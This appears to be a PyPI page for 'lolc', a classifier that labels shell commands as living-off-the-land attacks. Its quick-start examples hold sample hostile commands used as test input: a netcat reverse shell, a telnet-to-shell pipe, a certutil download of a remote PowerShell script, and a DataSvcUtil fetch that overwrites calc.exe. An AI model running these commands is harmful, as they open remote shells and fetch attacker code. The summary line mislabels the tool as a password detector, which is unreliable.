Skip to main content

Python module for detecting password, api keys hashes and any other string that resembles a randomly generated character sequence.

Project description

Living of the Land Classifier

This repository contains the source code and pre-trained models for the Living of the Land Classifier, designed by the Security Intelligence (SI) Team of the Security Coordination Center (SCC) @ Adobe.

Quick start guide

If you have experience with python and are eager to get started, check the Quick start Jupyter Notebook, instead of this documentation.

To get the library up and running in no time, use the following tutorial. If you want to build you own model, please refer to the "Advanced usage and documentation" section (below).

Prerequisites

Before you proceed, make sure your system meets the following requirements:

  • Python 3.7+ installed and running on your system
  • PIP package installer
  • We recommend using a virtual environment. See the official documentation for details

Quick installation

The easiest way to get LOL running is to use the pip:

You can use the following command directly on your system or in the virtual environment (recommended):

$ pip install lolc

To test the installation you can use the following scripts or ipython commands, which are also in the Quick start Jupyter Notebook:

LINUX

from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.LINUX) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['nc -nlvp 1234 & nc -e /bin/bash 10.20.30.40 4321',
          'iptables -t nat -L -n',
          'telnet 10.20.30.40 5000 | /bin/sh | 10.20.30.50 5001']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
    print(command)
    print(status)
    print(tag)
    print("\n")

The output should be:

nc -nlvp 1234 & nc -e /bin/bash 10.20.30.40 4321
BAD
IP_PRIVATE PATH_/BIN/BASH COMMAND_NC KEYWORD_-NLVP KEYWORD_-E nc_listener_to_shell LOOKS_LIKE_KNOWN_LOL

iptables -t nat -L -n
GOOD
COMMAND_IPTABLES KEYWORD_-T KEYWORD_-L KEYWORD_-N iptables_list

telnet 10.20.30.40 5000 | /bin/sh | 10.20.30.50 5001
BAD
IP_PRIVATE PATH_/BIN/SH COMMAND_TELNET telnet_sh LOOKS_LIKE_KNOWN_LOL

WINDOWS

from lol.api import LOLC, PlatformType
lolc=LOLC(PlatformType.WINDOWS) # allowed parameters are PlatformType.LINUX and PlatformType.WINDOWS
commands=['certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\\temp:ttt',
          'explorer.exe c:\\temp',
          'DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://11.11.11.11/xxxxxxxxx?encodedfile']
classification, tags = lolc(commands)
for command, status, tag in zip (commands, classification, tags):
    print(command)
    print(status)
    print(tag)
    print("\n")

The output should be:

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
BAD
COMMAND_CERTUTIL.EXE KEYWORD_dash_urlcache KEYWORD_dash_f KEYWORD_http certutil_downloader powershell_file

explorer.exe c:\temp
NEUTRAL
# this line is empty

DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://11.11.11.11/xxxxxxxxx?encodedfile
BAD
IP_PUBLIC COMMAND_DATASVCUTIL DataSvcUtil_http KEYWORD_http

Advanced usage and documentation

This documentation is still under development. We will provide complete examples accompanied by Jupyter Notebooks.

Installation via GitHub (for advanced usage)

git clone git@github.com:adobe/libLOL.git
cd libLOL
virtualenv -p `which python3` venv
source venv/bin/activate
pip3 install -r requirements.txt

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

lolc-0.1.0.6.tar.gz (4.4 MB view details)

Uploaded Source

Built Distribution

lolc-0.1.0.6-py3-none-any.whl (4.5 MB view details)

Uploaded Python 3

File details

Details for the file lolc-0.1.0.6.tar.gz.

File metadata

  • Download URL: lolc-0.1.0.6.tar.gz
  • Upload date:
  • Size: 4.4 MB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.8.0 pkginfo/1.8.2 readme-renderer/32.0 requests/2.27.1 requests-toolbelt/0.9.1 urllib3/1.26.8 tqdm/4.63.0 importlib-metadata/4.11.2 keyring/23.5.0 rfc3986/2.0.0 colorama/0.4.4 CPython/3.8.9

File hashes

Hashes for lolc-0.1.0.6.tar.gz
Algorithm Hash digest
SHA256 8f72c45669aec91534bf318f7fe71e178c1059ed9fff5009578a76934867abb6
MD5 0a2b54852d0b4538d507dcab890c8d44
BLAKE2b-256 6e6d215525faa3493aba7138c0a82e361181e6e581ab832c89045bedc3ba2078

See more details on using hashes here.

File details

Details for the file lolc-0.1.0.6-py3-none-any.whl.

File metadata

  • Download URL: lolc-0.1.0.6-py3-none-any.whl
  • Upload date:
  • Size: 4.5 MB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/3.8.0 pkginfo/1.8.2 readme-renderer/32.0 requests/2.27.1 requests-toolbelt/0.9.1 urllib3/1.26.8 tqdm/4.63.0 importlib-metadata/4.11.2 keyring/23.5.0 rfc3986/2.0.0 colorama/0.4.4 CPython/3.8.9

File hashes

Hashes for lolc-0.1.0.6-py3-none-any.whl
Algorithm Hash digest
SHA256 c9794a19b675bfd7ff3f7f48b00bdb66771c8583a40bbbd65627533c37a0cf22
MD5 04abafc3a51e4ea8c1bf721bbb6ea3ca
BLAKE2b-256 0f5771a2e9078d5c2a933e300c5844c447205fee189a34138f70328720ae9d02

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page